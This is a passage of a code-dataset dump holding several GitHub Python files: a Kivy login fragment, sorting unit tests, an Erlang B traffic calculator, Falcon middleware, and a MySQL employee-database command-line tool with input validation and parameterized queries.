filled\"\n\t\t\t\tself.ids.pw.background_color=(1,0,0,1)\n\t\t\telse :\n\t\t\t\tself.ids.pw.background_color=(0,1,1,1)\t\n\t\t\t\t\n\tdef CA(self):\n \t\t#Page Create Account\n\t\t\tself.manager.transition.direction = 'up'\n\t\t\tself.manager.current = 'Create Account'\t\n\tdef RP(self):\n \t\t#Page Recover Account\n\t\t\tself.manager.transition.direction = 'down'\n\t\t\tself.manager.current = 'Recovery Password'\n\n\n# class Main(App):\n# \tWindow.size=(1380,780)\n# \tWindow.top = 100\n# \tWindow.left = 250\n# \ttitle=\" My Application\"\n# \tdef build(self):\n# \t\treturn Login_Lay()\n\n# Main().run()","repo_name":"mohandesinarmafzar1400/MP","sub_path":"Code/Pass/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23644880242","text":"\"\"\" 3: Sorting test file\r\n\r\n thomas moll 2015\r\n\"\"\"\r\n\r\nimport unittest\r\nimport sorting\r\n\r\nclass TestSortingMethods(unittest.TestCase):\r\n def setUp(self):\r\n self.unordered = [4,14,6,21,11,9,7,5]\r\n self.ordered = [4,5,6,7,9,11,14,21]\r\n self.unordered_with_dupes = [4,5,6,7,6,5,4,5]\r\n self.ordered_with_dupes = [4,4,5,5,5,6,6,7]\r\n\r\n def test_static_sorts(self):\r\n # Note: None of these methods should affect the original lists!\r\n original = self.unordered\r\n\r\n sorting.selection_sort(self.unordered)\r\n self.assertEqual(original, self.unordered)\r\n\r\n sorting.insertion_sort(self.unordered)\r\n self.assertEqual(original, 
self.unordered)\r\n\r\n sorting.merge_sort(self.unordered)\r\n self.assertEqual(original, self.unordered)\r\n\r\n def test_selection_sort(self):\r\n test = sorting.selection_sort(self.unordered)\r\n self.assertEqual(test, self.ordered)\r\n\r\n test = sorting.selection_sort(self.unordered_with_dupes)\r\n self.assertEqual(test, self.ordered_with_dupes)\r\n\r\n def test_insertion_sort(self):\r\n test = sorting.insertion_sort(self.unordered)\r\n self.assertEqual(test, self.ordered)\r\n\r\n test = sorting.insertion_sort(self.unordered_with_dupes)\r\n self.assertEqual(test, self.ordered_with_dupes)\r\n\r\n def test_merge_sort(self):\r\n test = sorting.merge_sort(self.unordered)\r\n self.assertEqual(test, self.ordered)\r\n\r\n test = sorting.merge_sort(self.unordered_with_dupes)\r\n self.assertEqual(test, self.ordered_with_dupes)\r\n\r\n def test_merge(self):\r\n # Note: merge works in O(n) time assuming that the two lists are SORTED\r\n num1 = [1,4,6,7,20]\r\n num2 = [2,5,9,23]\r\n orig1, orig2 = num1, num2\r\n ans = [1,2,4,5,6,7,9,20,23]\r\n\r\n test = sorting.merge(num1, num2)\r\n self.assertEqual(test, ans)\r\n\r\n self.assertEqual(orig1, num1)\r\n self.assertEqual(orig2, num2)\r\n\r\n def test_quick_sort(self):\r\n test = self.unordered\r\n test_with_dupes = self.unordered_with_dupes\r\n\r\n sorting.quick_sort(test, 0, len(test)-1)\r\n sorting.quick_sort(test_with_dupes, 0, len(test_with_dupes)-1)\r\n\r\n self.assertEqual(test, self.ordered)\r\n self.assertEqual(test_with_dupes, self.ordered_with_dupes)\r\n\r\n def test_partition(self):\r\n test = self.unordered\r\n ans = [4, 5, 6, 21, 11, 9, 7, 14]\r\n pivot_ans = 1\r\n\r\n pivot = sorting.partition(test, 0, len(test)-1)\r\n\r\n self.assertEqual(ans, test)\r\n self.assertEqual(pivot, pivot_ans)\r\n\r\nif __name__ == '__main__':\r\n unittest.main(verbosity=2)\r\n","repo_name":"QuantumFractal/Data-Structure-Zoo","sub_path":"2-Sorting/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"24527184164","text":"from plot.PlotProbability import Graph\n\n\nclass ErlangModelB:\n def __init__(self):\n self.memo = {}\n pass\n\n def __erlang_model_B(self, A, N):\n if N == 0:\n return 1\n elif self.memo.get(N):\n return self.memo[N]\n else:\n result = (A * self.__erlang_model_B(A, N - 1)) / (A * self.__erlang_model_B(A, N - 1) + N)\n self.memo[N] = result\n return result\n\n def __expand_amount_of_probes(self, array):\n first_value = array[0]\n last_value = array[1]\n position = 1\n for value in range(first_value + 1, last_value):\n array.insert(position, value)\n position += 1\n return array\n\n def calculate_probability_of_blocking(self, average_traffic, number_of_lines):\n probabilities_of_blocking = []\n x_values_for_plot = []\n x_axis_name = \"\"\n if isinstance(average_traffic, list):\n average_traffic = self.__expand_amount_of_probes(average_traffic)\n x_values_for_plot = average_traffic\n x_axis_name = \"Average traffic [Erlang]\"\n for traffic in average_traffic:\n self.memo = {}\n probability_of_blocking = round(self.__erlang_model_B(traffic, number_of_lines), 3)\n probabilities_of_blocking.append(probability_of_blocking)\n elif isinstance(number_of_lines, list):\n number_of_lines = self.__expand_amount_of_probes(number_of_lines)\n x_values_for_plot = number_of_lines\n x_axis_name = \"Number of lines\"\n for line in number_of_lines:\n probability_of_blocking = round(self.__erlang_model_B(average_traffic, line), 
3)\n probabilities_of_blocking.append(probability_of_blocking)\n else:\n probability_of_blocking = round(self.__erlang_model_B(average_traffic, number_of_lines), 3)\n probabilities_of_blocking.append(probability_of_blocking)\n\n if x_values_for_plot:\n Graph(x_values_for_plot, x_axis_name, probabilities_of_blocking)\n return probabilities_of_blocking\n","repo_name":"MPogotsky/ErlangTrafficCalculator","sub_path":"src/ErlangModel.py","file_name":"ErlangModel.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71865194988","text":"import falcon\nimport httperrors as HTTP_ERRORS\nfrom bson import json_util\n\nclass Middleware(object):\n\n # Process the request before routing it.\n #def process_request(self, req, resp):\n # \n \n # Process the request after routing.\n def process_resource(self, req, resp, resource, params):\n if 'theCookie' not in req.cookies and not hasattr(resource, 'no_auth'):\n raise HTTP_ERRORS.HTTP_OK_ERROR('Cookie', 'No Cookie Provided')\n \n \n # Post-processing of the response (after routing).\n def process_response(self, req, resp, resource, req_succeeded):\n if(req_succeeded):\n if(resp.media and 'status' not in resp.media):\n resp.media['status'] = 'OK'\n elif(resp.body):\n json_util.loads(resp.body)\n \n \n \n \n\n \n","repo_name":"JustJaw/Tic-Tac-Toe-Service","sub_path":"tic_tac_service/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13560075615","text":"import mysql.connector\nimport datetime\n\n\n\n# These set of GET methods acquire a valid input for the respective entry \ndef GetSsn():\n Ssn = 0\n while(1): # Minit (NULL - NO, char(9))\n try: \n Ssn = input(\"Enter the Social Security number XXXXXXXXX: \")\n if (Ssn.isnumeric() == False):\n raise ValueError\n if (Ssn.upper() == \"NULL\"):\n raise NameError\n if (len(Ssn) != 9):\n raise IndexError\n except ValueError:\n print(\"Error: Ssn must be of type char(9) with all numerical values\\n\")\n except NameError:\n print(\"Error: Ssn cannot be NULL\\n\")\n except IndexError:\n print(\"Error: Ssn must be exactly 9 digits long\\n\")\n else:\n return Ssn\ndef GetSuperSsn():\n Super_ssn = \"\"\n while(1): # Super_ssn (NULL - Yes, char(9))\n try: \n Super_ssn = input(\"Enter the Supervisor Social Security number XXXXXXXXX: \")\n if (Super_ssn.isnumeric() == False):\n raise ValueError\n if (len(Super_ssn) != 9):\n raise IndexError\n except ValueError:\n print(\"Error: Super_ssn must be of type char(9) with all numerical values\\n\")\n except IndexError:\n print(\"Error: Super_ssn must be exactly 9 digits long\\n\")\n else:\n return Super_ssn\n\ndef GetDno():\n Dn = 0\n while(1): # Dno (NULL - NO, int(11))\n try: \n Dno = input(\"Enter the department number : \")\n if (Dno.isnumeric() == False):\n raise ValueError\n if (Dno.upper() == \"NULL\"):\n raise NameError\n except ValueError:\n print(\"Error: Dno must be of type int(11)\\n\")\n except NameError:\n print(\"Error: Dno cannot be NULL\\n\")\n else:\n return Dno\n\ndef GetFname():\n Fname = \"\"\n while(1): # Fname (NULL - NO, varchar(15))\n try: \n Fname = input(\"Enter the First Name: \")\n if (Fname.isnumeric() == True):\n raise ValueError\n if (Fname.upper() == \"NULL\"):\n raise NameError\n if (len(Fname) > 15):\n raise IndexError\n except ValueError:\n print(\"Error: Fname must be of type varchar(15)\\n\")\n 
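The Erlang B recursion in the ErlangModelB record above (B(A, 0) = 1; B(A, n) = A*B(A, n-1) / (A*B(A, n-1) + n)) can also be evaluated iteratively, which needs neither the memo dict nor recursion depth. A minimal sketch in plain Python, not taken from the record:

def erlang_b(traffic, lines):
    # blocking probability B(A, n), built up from B(A, 0) = 1
    b = 1.0
    for n in range(1, lines + 1):
        b = traffic * b / (traffic * b + n)
    return b

print(round(erlang_b(10, 10), 4))  # 0.2146, matching standard Erlang B tables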
except NameError:\n print(\"Error: Fname cannot be NULL\\n\")\n except IndexError:\n print(\"Error: Fname can only be 15 characters max length\\n\")\n else:\n return Fname\n\ndef GetMinit():\n Minit = \"\"\n while(1): # Minit (NULL - YES, char(1))\n try: \n Minit = input(\"Enter the Middle Initial: \")\n if (Minit.isnumeric() == True):\n raise ValueError\n if (len(Minit) > 1):\n raise IndexError\n except ValueError:\n print(\"Error: Minit must be of type char(1)\\n\")\n except IndexError:\n print(\"Error: Minit can only be 1 character max length\\n\")\n else:\n return Minit\n\ndef GetLname():\n Lname = \"\"\n while(1): # Fname (NULL - NO, varchar(15))\n try: \n Lname = input(\"Enter the Last Name: \")\n if (Lname.isnumeric() == True):\n raise ValueError\n if (Lname.upper() == \"NULL\"):\n raise NameError\n if (len(Lname) > 15):\n raise IndexError\n except ValueError:\n print(\"Error: Lname must be of type varchar(15)\\n\")\n except NameError:\n print(\"Error: Lname cannot be NULL\\n\")\n except IndexError:\n print(\"Error: Lname can only be 15 characters max length\\n\")\n else:\n return Lname\n \ndef ValidSsn():\n Ssn = \"\"\n FoundSsn = True\n while(FoundSsn):\n Ssn = GetSsn()\n Query = \"select COUNT(Ssn) from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 0):\n FoundSsn = False\n else:\n print(\"Error Primary Key Constraint Ssn must be unique\\n\")\n return Ssn\n\n\n\ndef GetBYear():\n BYear = \"\"\n while(1): # BYear (NULL - YES, date)\n try: \n BYear = input(\"Enter the Year XXXX: \")\n if (BYear.isalpha()):\n if (BYear.upper() == \"NULL\"):\n break\n if (BYear.isnumeric() == False):\n raise ValueError\n if (len(BYear) != 4):\n raise IndexError\n except ValueError:\n print(\"Error: Year must be of type Year\\n\")\n except IndexError:\n print(\"Error: Year format is wrong (XXXX)\\n\")\n else:\n return BYear\n return BYear\n \n\ndef GetBMonth():\n BMonth = \"\"\n while(1): # BMonth(NULL - YES, date)\n try: \n BMonth = input(\"Enter the Month: \")\n if (BMonth.isalpha()):\n if (BMonth.upper() == \"NULL\"):\n break\n if (BMonth .isnumeric() == False):\n raise ValueError\n if (int(BMonth) > 12 or int(BMonth) < 1):\n raise IndexError\n except ValueError:\n print(\"Error: Month must be of type Month\\n\")\n except IndexError:\n print(\"Error: Month can be between (1 - 12)\\n\")\n else:\n return BMonth\n return BMonth\n \n\ndef GetBDay():\n\n BDay = \"\"\n while(1): # BMonth(NULL - YES, date)\n try: \n BDay = input(\"Enter the day X or XX: \")\n if (BDay.isalpha()):\n if (BDay.upper() == \"NULL\"):\n break\n if (BDay .isnumeric() == False):\n raise ValueError\n if (int(BDay) > 31 or int(BDay) < 1):\n raise IndexError\n except ValueError:\n print(\"Error: day must be of type day\\n\")\n except IndexError:\n print(\"Error: day can be between 1 - 31\\n\")\n else:\n return BDay\n return BDay\n \n\n\n\ndef GetBdate():\n Bdate = \"\"\n BYear = GetBYear()\n BMonth = GetBMonth()\n BDay = GetBDay()\n if (BDay.upper() == \"NULL\" or BMonth.upper() == \"NULL\" or BYear.upper() == \"NULL\"):\n Bdate = \"NULL\"\n else:\n Bdate = datetime.date(int(BYear), int(BMonth), int(BDay))\n return Bdate\n\ndef GetAddress():\n Address = \"\"\n while(1): # Address (NULL - YES, varchar(30))\n try: \n Address = input(\"Enter the Address: \")\n if (Address.isnumeric() == True):\n raise ValueError\n if (len(Address) > 30):\n raise IndexError\n except ValueError:\n print(\"Error: Address must be of type varchar(30)\\n\")\n except IndexError:\n 
print(\"Error: Address can only be 30 characters max length\\n\")\n else:\n return Address\n\ndef GetSex():\n Sex = \"\"\n while(1): # Sex (NULL - YES, char(1))\n try: \n Sex = input(\"Enter the Sex (M/F): \")\n if (Sex.isnumeric() == True):\n raise ValueError\n if (len(Sex) > 1):\n raise IndexError\n except ValueError:\n print(\"Error: Sex must be of type char(1)\\n\")\n except IndexError:\n print(\"Error: Sex can only be 1 character M or F\\n\")\n else:\n return Sex\n\ndef GetSalary():\n Salary = 0\n while(1): # Salary (NULL - YES, decimal(10,2))\n try: \n Salary = input(\"Enter the salary: \")\n if (Salary.isalpha() == True):\n raise ValueError\n except ValueError:\n print(\"Error: Salary must be of type decimal(10,2)\\n\")\n else:\n return Salary\n\ndef SuperSsn():\n Super_ssn = \"\"\n foundSuperSsn = True\n while(foundSuperSsn):\n Super_ssn = GetSuperSsn()\n Query = \"select COUNT(Ssn) from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Super_ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 1):\n foundSuperSsn = False\n else:\n print(\"Error Foreign Key Constraint Super_ssn must reference an existing ssn\\n\") \n return Super_ssn\n\n\n\ndef ValidDno():\n Dno = 0\n Keeplooking = True\n while (Keeplooking):\n Dno = GetDno()\n Query = \"select COUNT(Dnumber) from DEPARTMENT WHERE Dnumber = %s\"\n mycursor.execute(Query, (Dno,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 1):\n Keeplooking = False\n else:\n print(\"Error Foreign Key Constraint Dno must reference an existing Department\\n\")\n return Dno\n\n\ndef AddNewEmployee(database):\n mycursor = database.cursor()\n\n # Input constraints on the input values\n Fname = GetFname()\n Minit = GetMinit()\n Lname = GetLname()\n Ssn = ValidSsn() # Constraint 1: Ssn Must be unique\n Bdate = GetBdate()\n Address = GetAddress()\n Sex = GetSex()\n Salary = GetSalary()\n Super_ssn = SuperSsn() # Constraint 2: Super_ssn must reference an existing Ssn entry\n Dno = ValidDno() # Constraint 3: Dno must reference an existing Department \n\n # Insert into the database and commit changes\n Insert_New_Employee = (\n \"\"\"INSERT INTO EMPLOYEE (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\")\n \n mycursor.execute(Insert_New_Employee, (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno))\n \n # Commit and close the connection\n database.commit()\n mycursor.close()\n\n\n\ndef ViewEmployee(database):\n # Employee info\n Employee_ssn = input(\"Enter an employee ssn: \")\n Query = \"select * from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Employee_ssn,)) \n result = mycursor.fetchall()\n print(\"Employee Information\\n----------------------\")\n for (Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno) in result:\n # Employee Information\n print(\"\\nFirst name: \"+ Fname)\n print(\"Middle initial: \" + Minit)\n print(\"Last name: \"+ Lname)\n print(\"SSN: \" + Ssn)\n print(\"Birth date: \"+ str(Bdate))\n print(\"Address: \"+ Address)\n print(\"Sex: \"+ Sex)\n print(\"Salary: $\" + str(Salary))\n print(\"Supervisor SSN: \" +Super_ssn)\n print(\"Department number: \"+ str(Dno))\n\n # Supervisor Name\n Query = \"select Fname, Minit, Lname from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Super_ssn,)) \n result = mycursor.fetchall()\n print(\"\\nSupervisor Name\\n----------------------\")\n for Fname, Minit, Lname in result:\n print(\"First name: \" + Fname)\n print(\"Middle 
initial: \" + Minit)\n print(\"Last name: \"+ Lname)\n \n # Department Name\n Query = \"select Dname from DEPARTMENT WHERE Dnumber = %s\"\n mycursor.execute(Query, (Dno,)) \n result = mycursor.fetchall()\n print(\"\\nDepartment Name\\n----------------------\")\n for Dname in result:\n print(\"Department Name: \"+Dname[0])\n \n # Dependents\n Query = \"select * from DEPENDENT WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n print(\"\\nDependents\\n----------------------\")\n for i in result:\n print(i)\n print()\n\n # Commit and close the connection\n database.commit()\n mycursor.close()\n\ndef ModifyMenu():\n print(\"Select an attribute to modify\\n\\t\\t(1)--Fname\\n\\t\\t(2)--Minit\\n\\t\\t(3)--Lname\\n\\t\\t(4)--Ssn\\n\\t\\t(5)--Bdate\\n\\t\\t\"+\n \"(6)--Address\\n\\t\\t(7)--Sex\\n\\t\\t(8)--Salary\\n\\t\\t(9)--Super_ssn\\n\\t\\t(10)-Dno\\n\")\n \ndef ModifyEmployee(database):\n mycursor = database.cursor()\n # Query the tuple and lock it\n Employee = input(\"Enter the employee ssn you want to modify: \")\n Query = (\"SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n for i in result:\n print(\"\\nProfile in Modification\\n---------------------\")\n print(i)\n print()\n\n ModifyMenu()\n option = 100\n while (1): # Input error handling\n try:\n option = int(input(\"Enter an option: \"))\n if (option < 1 or option > 10):\n raise ValueError\n except ValueError:\n print(\"Try again and enter a valid number\")\n else:\n break\n\n if (option == 1): # Fname\n Fname = GetFname()\n Query = \"UPDATE EMPLOYEE SET Fname = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Fname, Employee, )) \n \n\n if (option == 2): # Minit\n Minit = GetMinit()\n Query = \"UPDATE EMPLOYEE SET Minit = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Minit, Employee, )) \n \n if (option == 3): # Lname\n Lname = GetLname()\n Query = \"UPDATE EMPLOYEE SET Lname = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Lname, Employee, )) \n\n if (option == 4): # Ssn\n Ssn = GetSsn()\n Query = \"UPDATE EMPLOYEE SET Ssn = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Ssn, Employee, )) \n\n if (option == 5): # Bdate\n print(\"Enter information about Birth day\")\n Bdate = GetBdate()\n Query = \"UPDATE EMPLOYEE SET Bdate = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Bdate, Employee, )) \n\n if (option == 6): # Address\n Address = GetAddress()\n Query = \"UPDATE EMPLOYEE SET Address = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Address, Employee, )) \n\n if (option == 7): # Sex\n Sex = GetSex()\n Query = \"UPDATE EMPLOYEE SET Sex = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Sex, Employee, )) \n\n if (option == 8): # Salary\n Salary = GetSalary()\n Query = \"UPDATE EMPLOYEE SET Salary = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Salary, Employee, )) \n\n if (option == 9): # Super_ssn\n Super_ssn = SuperSsn()\n Query = \"UPDATE EMPLOYEE SET Super_ssn = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Super_ssn, Employee, )) \n\n if (option == 10): # Dno\n Dno = ValidDno()\n Query = \"UPDATE EMPLOYEE SET Dno = %s WHERE Ssn = %s\"\n mycursor.execute(Query, (Dno, Employee, )) \n\n\n\n # Commit and close the connection\n database.commit()\n mycursor.close()\n\n \n\ndef AddNewDependent(database):\n mycursor = database.cursor()\n # Lock the employee record\n Employee = input(\"Enter the employee ssn you want to add a dependent to: \")\n Query = (\"SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE\")\n 
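Every modification path in this Database.py record repeats one transaction pattern: lock the target row with SELECT ... FOR UPDATE, then run a parameterized statement so mysql.connector escapes the values instead of splicing them into the SQL string. A condensed sketch of that pattern against the record's COMPANY schema (the ssn and salary values are hypothetical):

import mysql.connector

db = mysql.connector.connect(user='root', password='', host='localhost', database='COMPANY')
cur = db.cursor()
ssn, new_salary = '123456789', 55000  # hypothetical values for illustration

cur.execute("SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE", (ssn,))
cur.fetchall()  # consume the locked rows before issuing the next statement
cur.execute("UPDATE EMPLOYEE SET Salary = %s WHERE Ssn = %s", (new_salary, ssn))
db.commit()  # the commit ends the transaction and releases the row lock
cur.close()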
mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n for i in result:\n print(\"\\nEmployee getting a new dependent\\n---------------------\")\n print(i)\n print()\n \n # Display all Dependents\n Query = (\"SELECT * FROM DEPENDENT WHERE Essn = %s\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n print(\"\\nList of Dependents\\n---------------------\")\n for i in result:\n print(i)\n print()\n \n # Inputs for new dependent\n Essn = Employee\n Dependent_Name = GetFname()\n Sex = GetSex()\n Bdate = GetBdate()\n Relationship = input(\"Enter the relationship to the Employee: \")\n\n # Insert Dependent into database\n Insert_New_Dependent = (\n \"\"\"INSERT INTO DEPENDENT (Essn, Dependent_name, Sex, Bdate, Relationship)\n VALUES (%s, %s, %s, %s, %s)\"\"\")\n mycursor.execute(Insert_New_Dependent, (Essn, Dependent_Name, Sex, Bdate, Relationship))\n\n Query = (\"SELECT * FROM DEPENDENT WHERE Essn = %s\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n print(\"\\nList of Dependents\\n---------------------\")\n for i in result:\n print(i)\n print()\n database.commit()\n mycursor.close()\n\n\n\n\ndef RemoveDependent(database):\n mycursor = database.cursor()\n # Lock the employee record\n Employee = input(\"Enter the employee ssn you want to remove a dependent from: \")\n Query = (\"SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n for i in result:\n print(\"\\nEmployee losing a dependent\\n---------------------\")\n print(i)\n print()\n \n # Display all Dependents\n Query = (\"SELECT * FROM DEPENDENT WHERE Essn = %s\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n print(\"\\nList of Dependents\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Remove the dependent from the database\n Dependent_Name = GetFname()\n Query = \"DELETE from DEPENDENT WHERE Dependent_name = %s\"\n mycursor.execute(Query, (Dependent_Name, )) \n database.commit()\n\n # Display all Dependents\n Query = (\"SELECT * FROM DEPENDENT WHERE Essn = %s\")\n mycursor.execute(Query, (Employee, )) \n result = mycursor.fetchall()\n print(\"\\nList of Dependents after modification\\n----------------------------\")\n for i in result:\n print(i)\n print()\n mycursor.close()\n\n\ndef AddNewDepartment(database):\n mycursor = database.cursor()\n # Constraint 1: Mgr_ssn must reference an employee ssn\n # Mgr_ssn cannot be null\n \n FoundSsn = True\n Mgr_ssn = \"\"\n while(FoundSsn):\n Mgr_ssn = input(\"Enter a Manager Ssn: \")\n if (Mgr_ssn.upper() == \"NULL\"):\n print(\"Mgr_ssn cannot be NULL\")\n continue\n Query = \"select COUNT(Ssn) from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Mgr_ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 1):\n FoundSsn = False\n else:\n print(\"Error: Foreign Key Constraint Mgr_ssn must reference an existing employee ssn\\n\")\n\n # Constraint 2: Dname must be unique\n # Dname cannot be NULL\n FoundSsn = True\n Dname = \"\"\n while(FoundSsn):\n Dname = input(\"Enter department Name: \")\n if (Dname.upper() == \"NULL\"):\n print(\"Department name cannot be NULL\")\n continue\n Query = \"select COUNT(Dname) from DEPARTMENT WHERE Dname = %s\"\n mycursor.execute(Query, (Dname,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 0):\n FoundSsn = False\n else:\n print(\"Error: Unique Key Constraint Dname must be unique\\n\")\n\n # Constraint 3: Dnumber has to be unique\n # Dnumber 
cannot be NULL\n FoundSsn = True\n Dnumber = \"\"\n while(FoundSsn):\n Dnumber = input(\"Enter department Number: \")\n if (Dnumber.upper() == \"NULL\"):\n print(\"Department number cannot be NULL\\n\")\n continue\n if (Dnumber.isalpha() == True):\n print(\"Department number has to be an integer\\n\")\n continue\n Query = \"select COUNT(Dnumber) from DEPARTMENT WHERE Dnumber = %s\"\n mycursor.execute(Query, (Dnumber,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] == 0):\n FoundSsn = False\n else:\n print(\"Error Unique Key Constraint Dnumber must be unique\\n\")\n\n \n # Mgr_start_date can be null\n print(\"Enter information about the manager start date\")\n Mgr_start_date = GetBdate()\n\n # Insert department into the database\n Insert_New_Department = (\n \"\"\"INSERT INTO DEPARTMENT (Dname, Dnumber, Mgr_ssn, Mgr_start_date)\n VALUES (%s, %s, %s, %s)\"\"\")\n \n mycursor.execute(Insert_New_Department, (Dname, Dnumber, Mgr_ssn, Mgr_start_date))\n database.commit()\n\n\n # Display all Dependents\n Query = (\"SELECT * FROM DEPARTMENT\")\n mycursor.execute(Query) \n result = mycursor.fetchall()\n print(\"\\nList of Departments\\n---------------------\")\n for i in result:\n print(i)\n print()\n\ndef AddDepartmentLocation(database):\n mycursor = database.cursor()\n # Ask for Dnumber\n Dnumber = input(\"Enter the department number: \")\n Query = (\"SELECT * FROM DEPARTMENT WHERE Dnumber = %s FOR UPDATE\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n\n # Show all locations\n Query = (\"SELECT * FROM DEPT_LOCATIONS WHERE Dnumber = %s\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n print(\"\\nList of Department Locations\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Ask for new location\n New_location = input(\"Enter a new location: \")\n # Create a new location record and insert into the database\n Insert_New_Dlocation = (\n \"\"\"INSERT INTO DEPT_LOCATIONS (Dnumber, Dlocation)\n VALUES (%s, %s)\"\"\")\n mycursor.execute(Insert_New_Dlocation, (Dnumber, New_location))\n database.commit()\n\n\ndef RemoveDepartmentLocation(database):\n mycursor = database.cursor()\n # Ask for Dnumber and lock the record\n Dnumber = input(\"Enter the department number: \")\n Query = (\"SELECT * FROM DEPARTMENT WHERE Dnumber = %s FOR UPDATE\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n\n # Show all locations\n Query = (\"SELECT * FROM DEPT_LOCATIONS WHERE Dnumber = %s\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n print(\"\\nList of Department Locations\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Ask for the location to be removed\n Location = input(\"Enter the location to be deleted: \")\n\n # remove the location\n Query = \"DELETE from DEPT_LOCATIONS WHERE Dlocation = %s AND Dnumber = %s\"\n mycursor.execute(Query, (Location, Dnumber, )) \n database.commit()\n\n\n print()\n # CLose the connection\n\ndef RemoveEmployee(database):\n mycursor = database.cursor()\n # Ask For Employee Ssn\n Ssn = input(\"Enter an employee SSN: \")\n\n # Lock and show employee information\n Query = (\"SELECT * FROM EMPLOYEE WHERE Ssn = %s FOR UPDATE\")\n mycursor.execute(Query, (Ssn, )) \n result = mycursor.fetchall()\n print(\"\\nEmployee entry for deletion\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Ask confirmation to delete\n confirm = True\n while (confirm):\n Confirmation = input(\"\\n1) Enter \\\"Yes\\\" if you wish to 
delete\\n2) Enter \\\"No\\\" to cancel\\n\")\n if (Confirmation.isalpha() == True):\n if (Confirmation.upper() == \"YES\"):\n confirm = False\n elif (Confirmation.upper() == \"NO\"):\n return\n\n\n # Check if any dependencies exist\n print()\n Dependencies = False\n\n # Constraint 1: Foreign key Constraint EMPLOYEE Super_ssn references employee Ssn\n Query = \"select COUNT(Super_ssn) from EMPLOYEE WHERE Super_ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign key Constraint, EMPLOYEE Super_ssn references employee ssn\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from EMPLOYEE WHERE Super_ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n # Constraint 2: Foreign Key Constraint, DEPENDENT Essn references employee SSN\n Query = \"select COUNT(Essn) from DEPENDENT WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign key Constraint, DEPENDENT Essn references employee ssn\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from DEPENDENT WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n # Constraint 3: Foreign Key Constraint, DEPARTMENT Mgr_ssn references employee ssn\n Query = \"select COUNT(Mgr_ssn) from DEPARTMENT WHERE Mgr_ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, DEPARTMENT Mgr_ssn references employee ssn\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from DEPARTMENT WHERE Mgr_ssn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n\n # Constraint 4: Foreign Key Constraint, WORKS_ON Essn references employee SSN\n Query = \"select COUNT(Essn) from WORKS_ON WHERE Essn = 